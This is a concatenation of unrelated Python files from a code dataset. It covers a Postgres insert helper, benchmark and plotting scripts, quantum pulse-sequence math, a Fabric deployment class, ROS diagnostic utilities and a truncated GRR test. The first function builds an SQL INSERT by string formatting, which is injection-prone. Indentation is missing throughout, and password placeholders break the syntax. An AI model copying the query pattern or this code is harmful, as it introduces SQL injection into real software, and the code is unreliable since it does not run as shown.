def insert_into_DOC_SIMILARITY(algo, d_1, d_2, similarity):
try:
insert_query = "INSERT INTO doc_similarity (algo_type, doc_id_1, doc_id_2, similarity) VALUES ('{0}', '{1}', '{2}', {3})" \
.format(algo, d_1, d_2, similarity)
cur.execute(insert_query)
conn.commit()
# print("Data was successfully inserted into DOC_SIMILARITY Table")
except (Exception, Error) as error:
logger.error("Error while inserting into DOC_SIMILARITY", error)
conn.rollback()
def close_postgres_connection():
cur.close()
conn.close()
logger.warning("Connection to PostgreSql is closed")
|
StarcoderdataPython
|
3289429
|
from retriever import benchmark_indexing, benchmark_querying
from reader import benchmark_reader
from utils import load_config
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--reader', default=False, action="store_true",
help='Perform Reader benchmarks')
parser.add_argument('--retriever_index', default=False, action="store_true",
help='Perform Retriever indexing benchmarks')
parser.add_argument('--retriever_query', default=False, action="store_true",
help='Perform Retriever querying benchmarks')
parser.add_argument('--ci', default=False, action="store_true",
help='Perform a smaller subset of benchmarks that are quicker to run')
parser.add_argument('--update_json', default=False, action="store_true",
help='Update the json file with the results of this run so that the website can be updated')
parser.add_argument('--save_markdown', default=False, action="store_true",
                    help='Save the results of this run as markdown files')
args = parser.parse_args()
# load config
params, filenames = load_config(config_filename="config.json", ci=args.ci)
if args.retriever_index:
benchmark_indexing(**params, **filenames, ci=args.ci, update_json=args.update_json, save_markdown=args.save_markdown)
if args.retriever_query:
benchmark_querying(**params, **filenames, ci=args.ci, update_json=args.update_json, save_markdown=args.save_markdown)
if args.reader:
benchmark_reader(**params, **filenames, ci=args.ci, update_json=args.update_json, save_markdown=args.save_markdown)
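# Example invocation (illustrative; assumes a config.json next to this script and
# that the script is saved as run_benchmarks.py, which is an assumption):
#   python run_benchmarks.py --retriever_index --retriever_query --ci --save_markdown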
|
StarcoderdataPython
|
3369645
|
import numpy as np
import quaternion
import operator
def isqrt(n):
"""
Return the integer part of the square root of the input.
(math.isqrt from Python 3.8)
"""
n = operator.index(n)
if n < 0:
raise ValueError("isqrt() argument must be nonnegative")
if n == 0:
return 0
c = (n.bit_length() - 1) // 2
a = 1
d = 0
for s in reversed(range(c.bit_length())):
# Loop invariant: (a-1)**2 < (n >> 2*(c - d)) < (a+1)**2
e = d
d = c >> s
a = (a << d - e - 1) + (n >> 2*c - e - d + 1) // a
return a - (a*a > n)
def phi_to_axis(phi):
'''
Converts an angle phi to the corresponding axis in the xy-plane
Inputs:
phi (float): counterclockwise angle from the x-axis in the xy-plane
Returns:
numpy array representing the axis in the xy-plane corresponding to angle phi
'''
x_axis = np.array([1, 0, 0])
y_axis = np.array([0, 1, 0])
return np.cos(phi) * x_axis + np.sin(phi) * y_axis
def xy_decomposition(axis, angle, theta = 0):
'''
Decompose the given rotation into a composition of rotations about axes in the xy-plane
Inputs:
axis: the axis of the rotation to be decomposed
angle: the angle of the rotation to be decomposed
theta: a degree of freedom for the xy decomposition, ranges from 0 to 2*pi
Returns:
list of 2-tuples in which the first element of each 2-tuple specifies an axis of rotation
and the second element of each 2-tuple specifies an angle of rotation
'''
#if axis is already in xy-plane, return sequence with original rotation
if abs(axis[2]) < 1e-12:
rotation_sequence = [(axis, angle)]
else:
#find a perpendicular axis with large magnitude (to minimize numerical errors)
perp_axis_1 = np.array([0, axis[2], -axis[1]])
if np.linalg.norm(perp_axis_1) < 0.7:
perp_axis_1 = np.array([-axis[2], 0, axis[1]])
if np.linalg.norm(perp_axis_1) < 0.7:
perp_axis_1 = np.array([-axis[1], axis[0], 0])
perp_axis_1 = perp_axis_1 / np.linalg.norm(perp_axis_1)
#find an axis perpendicular to both axes
perp_axis_2 = np.cross(axis, perp_axis_1)
perp_axis_2 = perp_axis_2 / np.linalg.norm(perp_axis_2)
#compute the axes of reflection for the two reflections that compose to give this rotation
reflect_1_axis = np.cos(theta) * perp_axis_1 + np.sin(theta) * perp_axis_2
reflect_2_axis = np.cos(theta + angle / 2) * perp_axis_1 + np.sin(theta + angle / 2) * perp_axis_2
#define the z-axis normal vector
z_axis = np.array([0, 0, 1])
#compose the first reflection with a reflection through the xy-plane and find the corresponding rotation
rotate_1_axis = np.cross(reflect_1_axis, z_axis)
rotate_1_axis = rotate_1_axis / np.linalg.norm(rotate_1_axis)
rotate_1_angle = 2 * np.arccos(np.dot(reflect_1_axis.T, z_axis))
#compose a reflection through the xy-plane with the second rotation and find the corresponding rotation
rotate_2_axis = np.cross(z_axis, reflect_2_axis)
rotate_2_axis = rotate_2_axis / np.linalg.norm(rotate_2_axis)
rotate_2_angle = 2 * np.arccos(np.dot(reflect_2_axis.T, z_axis))
#create a rotation sequence corresponding to these two rotations
rotation_sequence = [(rotate_1_axis, rotate_1_angle), (rotate_2_axis, rotate_2_angle)]
return rotation_sequence
def axis_switch(init_axis, final_axis):
'''
Provide the axis and angle required to rotate from one vector to another
Inputs:
init_axis: the initial axis vector to be rotated
final_axis: the target axis vector to which the initial axis vector is to be rotated
Returns:
vector and scalar representing the axis and angle of a rotation that takes init_axis to final_axis
'''
#compute the rotation axis that is perpendicular to both axes to be the axis of rotation
#compute the rotation angle as the angle between the initial axis and the final axis
rotation_axis = np.cross(init_axis, final_axis)
rotation_axis = rotation_axis / np.linalg.norm(rotation_axis)
rotation_angle = np.arccos(np.dot(init_axis.T, final_axis))
return rotation_axis, rotation_angle
def alpha_beta_decomposition(subspace_angle, gate = "X"):
'''
Given an angle and a gate, compute the two axes of the rotations and the number of rotations to make this gate
In particular, the gate is given by num_b_rotations rotations of angle subspace_angle about axis beta
followed by one rotation of angle subspace_angle about angle alpha
Inputs:
subspace_angle: the angle of rotation
gate: the gate to be obtained
Returns:
two axes alpha and beta and a number of rotations num_b_rotations
such that num_b_rotations rotations of angle subspace_angle about axis beta
followed by one rotation of angle subspace_angle about angle alpha
results in the desired gate
'''
#calculate the number of rotations required to achieve an X or Y gate (i.e., a rotation by pi)
effective_rot_angle = subspace_angle if subspace_angle <= np.pi else 2 * np.pi - subspace_angle
num_b_rotations = int(np.ceil(np.pi / effective_rot_angle)) - 1
#define two convenient angles for calculation of alpha and beta
angle1 = subspace_angle / 2
angle2 = num_b_rotations * subspace_angle / 2
#solve for the components of the axes for each gate type
if gate == "X":
#b2 is a free parameter that must have magnitude at most sqrt(1 - cos^2(angle1)/sin^2(angle2))
b2 = 0
b1 = np.cos(angle1) / np.sin(angle2)
b3 = 1 / np.sin(angle2) * np.sqrt(-1 * np.cos(angle1) ** 2 + np.sin(angle2) ** 2 - b2 ** 2 * np.sin(angle2) ** 2)
a1 = np.cos(angle2) / np.sin(angle1)
a2 = 1 / np.sin(angle1) * np.sqrt(-1 * np.cos(angle1) ** 2 + np.sin(angle2) ** 2 - b2 ** 2 * np.sin(angle2) ** 2)
a3 = -1 * b2 * np.sin(angle2) / np.sin(angle1)
elif gate == "Y":
#b1 is a free parameter that must have magnitude at most sqrt(1 - cos^2(angle1)/sin^2(angle2))
b1 = 0
b2 = np.cos(angle1) / np.sin(angle2)
b3 = 1 / np.sin(angle2) * np.sqrt(-1 * np.cos(angle1) ** 2 + np.sin(angle2) ** 2 - b1 ** 2 * np.sin(angle2) ** 2)
a1 = -1 / np.sin(angle1) * np.sqrt(-1 * np.cos(angle1) ** 2 + np.sin(angle2) ** 2 - b1 ** 2 * np.sin(angle2) ** 2)
a2 = np.cos(angle2) / np.sin(angle1)
a3 = b1 * np.sin(angle2) / np.sin(angle1)
else:
raise Exception("unsupported gate " + gate)
#synthesize the components into rotation axes alpha and beta
beta = np.array([b1, b2, b3])
alpha = np.array([a1, a2, a3])
return alpha, beta, num_b_rotations
def identity_order(n, k):
'''
Computes the order in which the subspaces should be cleaned to the identity
Inputs:
n: the total number of subspaces in the system
k: the 1-indexed number of the subspace that is to be X or Y (and not identity)
Returns:
two lists, the first of which contains the two indices of the subspaces to be cleaned first
and the second of which contains the remaining indices of the subspaces to be cleaned next
'''
#account for all subspaces from 1 to n apart from k
remaining_indices = list(range(1, k)) + list(range(k + 1, n + 1))
two_pulse_spaces = []
remaining_spaces = []
#select two indices mu_1 and mu_2 to be cleaned according to the condition
#sqrt(k/mu_1), sqrt(k/mu_2) are not integers
for idx in range(len(remaining_indices)):
subspace_idx = remaining_indices[idx]
if k % subspace_idx != 0 or (isqrt(k // subspace_idx)) ** 2 != (k // subspace_idx):
two_pulse_spaces.append(subspace_idx)
if len(two_pulse_spaces) == 2:
remaining_spaces.extend(remaining_indices[idx + 1:])
break
else:
remaining_spaces.append(subspace_idx)
return two_pulse_spaces, remaining_spaces
def perpendicular_vector(axis, theta = 0):
'''
Computes a vector perpendicular to a given axis with a degree of freedom
Inputs:
axis: the axis to which a perpendicular axis vector is found
theta: a degree of freedom for the choice of perpendicular axis, ranges from 0 to 2*pi
Returns:
a vector perpendicular to the given vector
'''
#if the axis is the z-hat vector, take the x-hat vector as the first perpendicular vector
if abs(axis[0]) < 1e-12 and abs(axis[1]) < 1e-12:
perp_axis_1 = np.array([1, 0, 0])
#otherwise, switch the x- and y-components and negate to obtain a perpendicular vector
else:
perp_axis_1 = np.array([-axis[1], axis[0], 0])
perp_axis_1 = perp_axis_1 / np.linalg.norm(perp_axis_1)
#use the cross product to find another perpendicular vector
perp_axis_2 = np.cross(axis, perp_axis_1)
perp_axis_2 = perp_axis_2 / np.linalg.norm(perp_axis_2)
#find a perpendicular vector from the combination of these two perpendicular vectors
#taking theta as a degree of freedom
return np.cos(theta) * perp_axis_1 + np.sin(theta) * perp_axis_2
def pre_and_post_conjugation(rotation_sequence, subspace_num):
'''
Produces the subspace-independent axis-angle representations of the
daggered and undaggered operations corresponding to a sequence on a given subspace
Inputs:
rotation_sequence: a list of 2-tuples specifying a sequence of axis-angle pulses
subspace_num: the 1-indexed number of the subspace on which these pulses are to be applied
Returns:
two lists of 2-tuples, the first of which corresponds to the daggered subspace-independent version of the input sequence
and the second of which corresponds to the undaggered subspace-independent version of the input sequence
'''
#reverse the sequence and negate the angles to produce the daggered version
#divide angles by the square root of the subspace number such that the rotations are subspace-independent
pre_conjugate_seq = [(axis, -angle / np.sqrt(subspace_num)) for (axis, angle) in reversed(rotation_sequence)]
post_conjugate_seq = [(axis, angle / np.sqrt(subspace_num)) for (axis, angle) in rotation_sequence]
return pre_conjugate_seq, post_conjugate_seq
def switch_axes_conjugation(init_axis, final_axis, subspace_num):
'''
Finds conjugation that switches a rotation about the initial axis to one about the final axis
on the subspace given by subspace_num
Inputs:
init_axis (array): initial axis of the rotation on the subspace
final_axis (array): final axis of the rotation on the subspace
subspace_num (int): 1-indexed number of the subspace
Returns:
two lists of 2-tuples, the first of which corresponds to the part of the conjugation before the rotation
        and the second of which corresponds to the part of the conjugation after the rotation
'''
axis_rotate, angle_rotate = axis_switch(init_axis, final_axis)
rotation_sequence = xy_decomposition(axis_rotate, angle_rotate)
pre_conjugate_seq, post_conjugate_seq = pre_and_post_conjugation(rotation_sequence, subspace_num)
return pre_conjugate_seq, post_conjugate_seq
def produce_sequence(n, k, gate = "X", perp_thetas = 0, decomp_thetas = 0):
'''
Produces a sequence that places a particular non-identity gate on a given subspace
and identity gates on all other subspaces for a finite-dimensional QO-Qudit
Inputs:
n (int): the number of subspaces in the finite quantum oscillator
k (int): the number of the subspace on which to place a non-identity gate
gate (str): the type of non-identity gate ("X" or "Y")
perp_thetas (float/int or list): degrees of freedom for finding perpendicular axes for cleaning n - 3 subspaces
decomp_thetas (float/int or list): degrees of freedom for xy-decomposition axes for cleaning n - 3 subspaces
Returns:
a list of 2-tuples with the axis-angle representations of the rotation sequence
to be performed to attain the desired gate on subspace k of n subspaces
'''
#if the non-identity subspace number exceeds the number of subspaces, raise an error
if k > n: raise ValueError("nonidentity gate position must be in range")
#if either subspace number or count is not an integer, raise an error
if type(k) is not int: raise TypeError("nonidentity gate position must be integer")
if type(n) is not int: raise TypeError("number of subspaces must be integer")
if n > 2:
#processing degrees of freedom for choosing perpendicular and xy-decomposition axes
if type(perp_thetas) is not list:
perp_thetas = [perp_thetas for _ in range(n - 3)]
if type(decomp_thetas) is not list:
decomp_thetas = [decomp_thetas for _ in range(n - 3)]
#raise exception if given degrees of freedom do not match those expected
if len(perp_thetas) != (n - 3):
raise ValueError("degrees of freedom for choice of perpendicular axes must be number of subspaces minus 3")
if len(decomp_thetas) != (n - 3):
raise ValueError("degrees of freedom for choice of xy-decomposition axes must be number of subspaces minus 3")
#handle the case of one subspace with one direct rotation
if n == 1:
if gate == "X":
return [(np.array([1, 0, 0]), np.pi)]
elif gate == "Y":
return [(np.array([0, 1, 0]), np.pi)]
else:
raise Exception("unsupported gate " + gate)
#handle the other base case of two subspaces
elif n == 2:
phi1 = np.arccos(1 / np.tan(np.pi / np.sqrt(2)))
phi2 = np.arccos(1 / np.tan(np.pi * np.sqrt(2)))
if k == 1:
seq = [(np.pi * np.sqrt(2), phi1), (np.pi / 2, 0), (np.pi * np.sqrt(2), phi1), (-np.pi / 2, 0)]
if gate == "X":
return [(phi_to_axis(phi), theta) for (theta, phi) in seq]
elif gate == "Y":
return [(phi_to_axis(phi + np.pi / 2), theta) for (theta, phi) in seq]
else:
raise Exception("unsupported gate " + gate)
elif k == 2:
seq = [(np.pi * 2, phi2), (np.pi / (2 * np.sqrt(2)), 0), (np.pi * 2, phi2), (-np.pi / (2 * np.sqrt(2)), 0)]
if gate == "X":
return [(phi_to_axis(phi), theta) for (theta, phi) in seq]
elif gate == "Y":
return [(phi_to_axis(phi + np.pi / 2), theta) for (theta, phi) in seq]
else:
raise Exception("unsupported gate " + gate)
#initialize sequences
pulse_sequence = []
two_pulse_spaces, remaining_spaces = identity_order(n, k)
n1 = two_pulse_spaces[0]
n2 = two_pulse_spaces[1]
phi1 = np.pi / np.sqrt(n1)
phi2 = 2 * np.pi / np.sqrt(n2)
#degree of freedom for 4-pulse sequence
angle4 = 0
#definition of 4-pulse sequence
identity_pulse_sequence = [(np.array([-np.sin(angle4), np.cos(angle4), 0]), phi2),
(np.array([np.cos(angle4), np.sin(angle4), 0]), phi1),
(np.array([-np.sin(angle4), np.cos(angle4), 0]), phi2),
(np.array([np.cos(angle4), np.sin(angle4), 0]), -phi1)]
#iterate over the remaining spaces to clean to identity
for idx, n_idx in enumerate(remaining_spaces):
#find the rotations on this subspace
idx_rotations = [quaternion.from_rotation_vector(vec * angle * np.sqrt(n_idx)) for (vec, angle) in identity_pulse_sequence]
#perform these rotations starting from the identity to find the final composite rotation on the subspace
idx_subspace = np.quaternion(1, 0, 0, 0)
for idx_rotation in idx_rotations:
idx_subspace = idx_rotation * idx_subspace
#find the angle and axis corresponding to the composite rotation on this subspace
idx_subspace_vec = quaternion.as_rotation_vector(idx_subspace)
idx_subspace_angle = np.linalg.norm(idx_subspace_vec)
if abs(idx_subspace_angle) < 1e-10:
continue
idx_subspace_axis = idx_subspace_vec / idx_subspace_angle
perp_axis = perpendicular_vector(idx_subspace_axis, perp_thetas[idx])
identity_rotation_sequence = xy_decomposition(perp_axis, np.pi, decomp_thetas[idx])
identity_pre_conjugate_seq, identity_post_conjugate_seq = pre_and_post_conjugation(identity_rotation_sequence, n_idx)
identity_pulse_sequence = identity_pulse_sequence + identity_pre_conjugate_seq + identity_pulse_sequence + identity_post_conjugate_seq
#apply the identity pulse sequence above on the subspace with the non-identity gate
gate_subspace = np.quaternion(1, 0, 0, 0)
gate_pulse_sequence = [quaternion.from_rotation_vector(vec * angle * np.sqrt(k)) for (vec, angle) in identity_pulse_sequence]
for pulse in gate_pulse_sequence:
gate_subspace = pulse * gate_subspace
#extract the axis and angle of the rotation on the subspace with the non-identity gate
gate_subspace_vec = quaternion.as_rotation_vector(gate_subspace)
gate_subspace_angle = np.linalg.norm(gate_subspace_vec)
gate_subspace_axis = gate_subspace_vec / gate_subspace_angle
print("garbage", gate_subspace_vec)
#determine the desired rotations with the angle of the rotation on the subspace with the non-identity gate
#that produce the desired gate on this subspace
alpha, beta, num_b_rotations = alpha_beta_decomposition(gate_subspace_angle, gate)
#determine the sequences by which the rotation on the subspace
#with the non-identity gate must be conjugated to yield the beta and alpha rotations
beta_pre_conjugate_seq, beta_post_conjugate_seq = switch_axes_conjugation(gate_subspace_axis, beta, k)
alpha_pre_conjugate_seq, alpha_post_conjugate_seq = switch_axes_conjugation(gate_subspace_axis, alpha, k)
#repeat the rotation on the subspace with the non-identity gate and conjugate to produce the beta rotations
pulse_sequence.extend(beta_pre_conjugate_seq)
for _ in range(num_b_rotations):
pulse_sequence.extend(identity_pulse_sequence)
pulse_sequence.extend(beta_post_conjugate_seq)
#conjugate the rotation on the subspace with the non-identity gate to produce the alpha rotation
pulse_sequence.extend(alpha_pre_conjugate_seq)
pulse_sequence.extend(identity_pulse_sequence)
pulse_sequence.extend(alpha_post_conjugate_seq)
#return the final pulse sequence
return pulse_sequence
def find_final_quaternions(pulse_sequence, n):
'''
Finds the final quaternion representation of the rotation on each of the first n subspaces
after the sequence of pulses given by pulse_sequence
Inputs:
pulse_sequence (list): a list of angle-axis tuples specifying the pulse sequence to be performed
Returns:
list of quaternions representing the composite rotations on the first n subspaces
'''
pulse_subspace_list = [[quaternion.from_rotation_vector(vec * angle * np.sqrt(s + 1)) for (vec, angle) in pulse_sequence] for s in range(n)]
rotation_list = [np.quaternion(1, 0, 0, 0) for s in range(n)]
for pulse_idx in range(len(pulse_sequence)):
rotation_list = [pulse_subspace_list[s][pulse_idx] * rotation_list[s] for s in range(n)]
return rotation_list
def find_final_angle_axis(pulse_sequence, n):
'''
Finds the final angle-axis representation of the rotation on each of the first n subspaces
after the sequence of pulses given by pulse_sequence
Inputs:
pulse_sequence (list): a list of angle-axis tuples specifying the pulse sequence to be performed
Returns:
list of axis-angle tuples representing the composite rotations on the first n subspaces
'''
final_quaternions = find_final_quaternions(pulse_sequence, n)
final_rotations = [quaternion.as_rotation_vector(q) for q in final_quaternions]
return [(np.linalg.norm(vec), vec / np.linalg.norm(vec)) if np.linalg.norm(vec) > 1e-12 else (0, np.array([0.0, 0.0, 0.0])) for vec in final_rotations]
def find_theta_phi_representation(pulse_sequence):
'''
Finds theta, phi representation of sequence of axis-angle rotations,
*assuming that all of the axes lie in the xy-plane*
Inputs:
pulse_sequence (list): a list of rotations in axis-angle tuple representation, must all be in xy-plane (i.e., have axis[2] = 0)
Returns:
list of tuples of theta-phi tuples representing the input rotation sequence
'''
return [(angle, np.arctan2(axis[1], axis[0])) for (axis, angle) in pulse_sequence]
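if __name__ == "__main__":
    # Minimal usage sketch (added for illustration, not part of the original module):
    # decompose a rotation about the z-axis into rotations about axes in the xy-plane,
    # then inspect the composite rotation the pulse sequence induces on the first
    # three subspaces.
    demo_sequence = xy_decomposition(np.array([0.0, 0.0, 1.0]), np.pi / 2)
    print("xy-plane pulses (theta, phi):", find_theta_phi_representation(demo_sequence))
    for subspace, (angle, axis) in enumerate(find_final_angle_axis(demo_sequence, 3), start=1):
        print("subspace", subspace, "-> angle:", angle, "axis:", axis)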
|
StarcoderdataPython
|
1679072
|
import argparse
from fabric.api import *
from fabric.tasks import Task
from playback import __version__
class Common(Task):
"""
the common library for OpenStack Provisioning
:param user(str): the user for remote server to login
:param hosts(list): this is a second param
:param key_filename(str): the ssh private key to used, default None
:param password(str): the password for remote server
:param parallel(bool): paralleler execute on remote server, default True
:returns: None
"""
def __init__(self, user='ubuntu', hosts=None, key_filename=None, password=<PASSWORD>, parallel=True, *args, **kwargs):
super(Common, self).__init__(*args, **kwargs)
self.user = user
self.hosts = hosts
self.parallel = parallel
self.key_filename = key_filename
self.password = password
env.user = self.user
env.hosts = self.hosts
env.parallel = self.parallel
env.key_filename = self.key_filename
env.password = <PASSWORD>
env.abort_on_prompts = False
def _release(self):
release = sudo('lsb_release -cs')
return release
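# Illustrative sketch (not from the original library): a concrete task built on
# Common. The host address and the credentials below are placeholders.
#
# from fabric.tasks import execute
#
# class ShowRelease(Common):
#     def run(self):
#         print(self._release())
#
# if __name__ == '__main__':
#     execute(ShowRelease(user='ubuntu', hosts=['192.0.2.10'], password='<PASSWORD>'))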
|
StarcoderdataPython
|
3212617
|
<reponame>DBernardes/Macro-SPARC4-CCD-cameras<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# This code plots the read-noise values found
# by the hyperopt library as a function of the iteration number.
# 22/11/2019. <NAME>.
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import json
from sys import exit
##arq = open(r'Logs\Parameters\log.txt', 'r')
##lines_parameters = arq.read().splitlines()
##lines_parameters = [i.split('\t') for i in lines_parameters]
##arq.close()
array_dic_modes=[]
with open(r'Logs\Parameters\log.txt', 'r') as arq:
lines = arq.read().splitlines()
for line in lines:
dic = json.loads(line)
array_dic_modes.append(dic)
arq.close()
##arq = open(r'Logs\Loss\log.txt', 'r')
##lines_loss = arq.read().splitlines()
##lines_loss = [float(i) for i in lines_loss[:-1]]
##arq.close()
t_exp = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
em_mode = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
em_gain = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
hss = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
preamp = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
binn = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
loss ={'0.1':[], '1':[], '10':[], '20':[], '30':[]}
# map each horizontal shift speed (MHz) onto its dictionary key
hss_keys = {0.1: '0.1', 1: '1', 10: '10', 20: '20', 30: '30'}
for dic in array_dic_modes:
    key = hss_keys.get(dic['hss'])
    if key is None:
        continue
    t_exp[key].append(dic['t_exp'])
    em_mode[key].append(dic['em_mode'])
    em_gain[key].append(dic['em_gain'])
    preamp[key].append(dic['preamp'])
    binn[key].append(dic['binn'])
    loss[key].append(dic['snr'])
fig = plt.figure()
list_fake2Dlines = []
list_labels = []
ax = fig.add_subplot((111), projection='3d')
if t_exp['30']:
ax.scatter(t_exp['30'], em_gain['30'], loss['30'], c='blue', marker='o', alpha=0.5)
fake2Dline1 = mpl.lines.Line2D([0],[0], linestyle="none", c='blue', marker = 'o')
list_fake2Dlines.append(fake2Dline1)
list_labels.append(r'30 MHz')
if t_exp['20']:
ax.scatter(t_exp['20'], em_gain['20'], loss['20'], c='red', marker='o', alpha=0.5)
fake2Dline2 = mpl.lines.Line2D([0],[0], linestyle="none", c='red', marker = 'o')
list_fake2Dlines.append(fake2Dline2)
list_labels.append(r'20 MHz')
if t_exp['10']:
ax.scatter(t_exp['10'], em_gain['10'], loss['10'], c='green', marker='o', alpha=0.5)
fake2Dline3 = mpl.lines.Line2D([0],[0], linestyle="none", c='green', marker = 'o')
list_fake2Dlines.append(fake2Dline3)
list_labels.append(r'10 MHz')
if t_exp['1']:
ax.scatter(t_exp['1'], em_gain['1'], loss['1'], c='tab:purple', marker='o', alpha=0.6)
fake2Dline4 = mpl.lines.Line2D([0],[0], linestyle="none", c='tab:purple', marker = 'o')
list_fake2Dlines.append(fake2Dline4)
list_labels.append(r'1 MHz')
if t_exp['0.1']:
ax.scatter(t_exp['0.1'], em_gain['0.1'], loss['0.1'], c='tab:olive', marker='o', alpha=0.8)
fake2Dline5 = mpl.lines.Line2D([0],[0], linestyle="none", c='tab:olive', marker = 'o')
list_fake2Dlines.append(fake2Dline5)
list_labels.append(r'0,1 MHz')
ax.set_xlabel('Exposure Time (s)')
ax.set_ylabel('EM Gain')
ax.set_zlabel('SNR*FA')
ax.legend(list_fake2Dlines, list_labels, numpoints = 1)
plt.show()
'''
for i in x:
line = lines_parameters[i]
binn = 0
if line[5] == str(2): binn = 1
if line[4] == str(1):
t_exp_1[binn].append(float(line[0]))
em_mode_1[binn].append(float(line[1]))
em_gain_1[binn].append(float(line[2]))
hss_1[binn].append(float(line[3]))
preamp_1[binn].append(float(line[4]))
binn_1[binn].append(float(line[5]))
loss_1[binn].append(lines_loss[i])
else:
t_exp_2[binn].append(float(line[0]))
em_mode_2[binn].append(float(line[1]))
em_gain_2[binn].append(float(line[2]))
hss_2[binn].append(float(line[3]))
preamp_2[binn].append(float(line[4]))
binn_2[binn].append(float(line[5]))
loss_2[binn].append(lines_loss[i])
'''
|
StarcoderdataPython
|
1655449
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of <NAME>, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: <NAME>, <NAME>, <NAME>
from diagnostic_msgs.msg import DiagnosticStatus
from python_qt_binding.QtGui import QColor, QIcon
import rospy
# TODO: Utils and common configs are mixed in this class.
# Instantiating icons that show the device status.
_ERR_ICON = QIcon.fromTheme('dialog-error')
_WARN_ICON = QIcon.fromTheme('dialog-warning')
_OK_ICON = QIcon.fromTheme('emblem-default')
# Added following this QA thread http://goo.gl/83tVZ
_STALE_ICON = QIcon.fromTheme('dialog-question')
_LEVEL_TO_ICON = {0: _OK_ICON, 1: _WARN_ICON, 2: _ERR_ICON, 3: _STALE_ICON}
_LEVEL_TO_COLOR = {0: QColor(85, 178, 76), # green
1: QColor(222, 213, 17), # yellow
2: QColor(178, 23, 46), # red
3: QColor(40, 23, 176) # blue
}
_LEVEL_TO_TEXT = { 0: "OK", 1: "WARNING", 2: "ERROR", 3: "STALE" }
def level_to_icon(level):
if level in _LEVEL_TO_ICON:
return _LEVEL_TO_ICON[level]
else:
return _ERR_ICON
def level_to_color(level):
if level in _LEVEL_TO_COLOR:
return _LEVEL_TO_COLOR[level]
else:
return _LEVEL_TO_COLOR[2]
def level_to_text(level):
if level in _LEVEL_TO_TEXT:
return _LEVEL_TO_TEXT[level]
else:
return "UNKNOWN(%d)" % ( level )
def get_resource_name(status_name):
"""
Get resource name from path
:param: status_name is a string that may consists of status names that
are delimited by slash.
:rtype: str
"""
name = status_name.split('/')[-1]
rospy.logdebug(' get_resource_name name = %s', name)
return name
def get_color_for_message(msg):
"""
Get the overall (worst) color for a DiagnosticArray
:param msg: DiagnosticArray
"""
level = 0
min_level = 255
lookup = {}
for status in msg.status:
if (status.level > level):
level = status.level
if (status.level < min_level):
min_level = status.level
# Stale items should be reported as errors unless all stale
if (level > 2 and min_level <= 2):
level = 2
rospy.logdebug(' get_color_for_message color lv=%d', level)
return level_to_color(level)
def get_status_by_name(msg, name):
for status in msg.status:
if status.name == name:
return status
return None
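# Small usage sketch (illustrative only, not part of the original utility):
# build a DiagnosticArray with two statuses and query the helpers above.
#
# from diagnostic_msgs.msg import DiagnosticArray
# msg = DiagnosticArray()
# msg.status = [DiagnosticStatus(name='/robot/battery', level=DiagnosticStatus.WARN),
#               DiagnosticStatus(name='/robot/motor', level=DiagnosticStatus.OK)]
# print(get_resource_name(msg.status[0].name))   # -> 'battery'
# print(level_to_text(msg.status[0].level))      # -> 'WARNING'
# print(get_color_for_message(msg))              # QColor of the worst level (yellow here)
# print(get_status_by_name(msg, '/robot/motor'))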
|
StarcoderdataPython
|
1739826
|
<gh_stars>0
#!/usr/bin/env python
"""Tests for grr.lib.timeseries."""
from grr.lib import flags
from grr.lib import test_lib
from grr.lib import timeseries
class TimeseriesTest(test_lib.GRRBaseTest):
def makeSeries(self):
s = timeseries.Timeseries()
for i in range(1, 101):
s.Append(i, (i + 5) * 10000)
return s
def testAppendFilterRange(self):
s = self.makeSeries()
self.assertEqual(100, len(s.data))
self.assertEqual([1, 60000], s.data[0])
self.assertEqual([100, 1050000], s.data[-1])
s.FilterRange(100000, 200000)
self.assertEqual(10, len(s.data))
self.assertEqual([5, 100000], s.data[0])
self.assertEqual([14, 190000], s.data[-1])
def testNormalize(self):
s = self.makeSeries()
s.Normalize(10 * 10000, 100000, 600000)
self.assertEqual(5, len(s.data))
self.assertEqual([9.5, 100000], s.data[0])
self.assertEqual([49.5, 500000], s.data[-1])
s = timeseries.Timeseries()
for i in range(0, 1000):
s.Append(0.5, i * 10)
s.Normalize(200, 5000, 10000)
self.assertEqual(25, len(s.data))
self.assertListEqual(s.data[0], [0.5, 5000])
self.assertListEqual(s.data[24], [0.5, 9800])
s = timeseries.Timeseries()
for i in range(0, 1000):
s.Append(i, i * 10)
s.Normalize(200, 5000, 10000, mode=timeseries.NORMALIZE_MODE_COUNTER)
self.assertEqual(25, len(s.data))
self.assertListEqual(s.data[0], [519, 5000])
self.assertListEqual(s.data[24], [999, 9800])
def testToDeltas(self):
